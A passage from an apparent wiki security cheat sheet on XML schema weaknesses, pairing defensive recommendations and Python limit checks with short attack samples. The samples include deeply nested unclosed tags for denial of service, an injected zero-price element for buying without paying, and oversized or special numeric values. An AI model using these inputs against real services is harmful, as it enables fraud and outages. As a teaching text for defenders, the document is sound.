				<updated>2016-12-21T18:50:54Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
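&lt;br /&gt;
The comparison described above can be sketched in Python as follows. The function name &amp;lt;tt&amp;gt;parse_seconds&amp;lt;/tt&amp;gt; is hypothetical, and the expat parser from the standard library is only a stand-in: the measurement is meaningful only when repeated with the XML processor actually deployed:&lt;br /&gt;

```python
import time
import xml.parsers.expat


def parse_seconds(document, repetitions=100):
    """Return the average time in seconds spent parsing document."""
    started = time.perf_counter()
    for _ in range(repetitions):
        parser = xml.parsers.expat.ParserCreate()
        try:
            parser.Parse(document, True)
        except xml.parsers.expat.ExpatError:
            # A fatal error is the expected outcome for malformed input;
            # the time spent reaching it is what is being measured.
            pass
    return (time.perf_counter() - started) / repetitions
```

Calling the function once with a regular document and once with a malformed version of the same document gives two averages to compare; a malformed version that is noticeably slower indicates exposure to this attack.&lt;br /&gt;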
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
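&lt;br /&gt;
Such limits can be enforced while the document is being parsed. The Python sketch below uses the expat bindings from the standard library; the names &amp;lt;tt&amp;gt;LimitExceeded&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;parse_with_limits&amp;lt;/tt&amp;gt; and the default limits are assumptions chosen for illustration:&lt;br /&gt;

```python
import xml.parsers.expat


class LimitExceeded(ValueError):
    """Raised when a document nests or repeats more than allowed."""


def parse_with_limits(document, max_depth=100, max_elements=10_000):
    """Parse document, aborting as soon as a structural limit is passed."""
    state = {'depth': 0, 'elements': 0}

    def on_start(name, attributes):
        state['depth'] += 1
        state['elements'] += 1
        if state['depth'] > max_depth or state['elements'] > max_elements:
            raise LimitExceeded('structural limit exceeded at element ' + name)

    def on_end(name):
        state['depth'] -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(document, True)
    return state['elements']
```

Because the check runs on every opening tag, a document such as the one above is rejected when it passes the configured depth instead of after 30,000 elements have been processed.&lt;br /&gt;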
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and set a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed was to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
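&lt;br /&gt;
A schema is the proper control, but the Python standard library does not ship an XML Schema validator. As an illustration only, the following sketch checks by hand one rule that a schema for the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; document would enforce, namely that no child element is repeated; the function name &amp;lt;tt&amp;gt;repeated_children&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import collections
import xml.etree.ElementTree as ET


def repeated_children(document):
    """Return the sorted tag names that occur more than once under the root."""
    root = ET.fromstring(document)
    counts = collections.Counter(child.tag for child in root)
    return sorted(tag for tag, count in counts.items() if count > 1)
```

For the tampered document above, the function reports both &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; as repeated, so the transaction can be refused before either value is used.&lt;br /&gt;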
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1,000,000 digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to no more than a certain number of characters and constrained to a certain set of characters (for example, the digits 0 to 9, the + sign, and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
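&lt;br /&gt;
As a minimal sketch of this recommendation, the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; document could be described with XML Schema instead of DTD. The limits chosen here (a name of 1 to 256 characters, an age between 0 and 150) are illustrative assumptions, not values taken from the example above:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed limit: 1 to 256 characters --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:minLength value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed limit: whole numbers from 0 to 150 --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Under these assumptions, a validating parser would reject the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value because it exceeds the declared maximum.&lt;br /&gt;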
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to input it was not designed to handle. The result could be the disclosure of internal errors, or documents that reach the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
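&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, a sketch using the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; data type might look as follows. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length of 16 octets (32 hexadecimal characters) are hypothetical choices made for illustration:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- hexBinary accepts only hexadecimal digits --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- for hexBinary, length is measured in octets --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Choosing the binary data type lets the schema processor check the character set, so no additional string pattern is needed.&lt;br /&gt;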
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price as &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid that logical vulnerability, the schema should probably use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML schemas offer data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a schema uses a data type that permits zero instead, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the schema can require that exact length as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
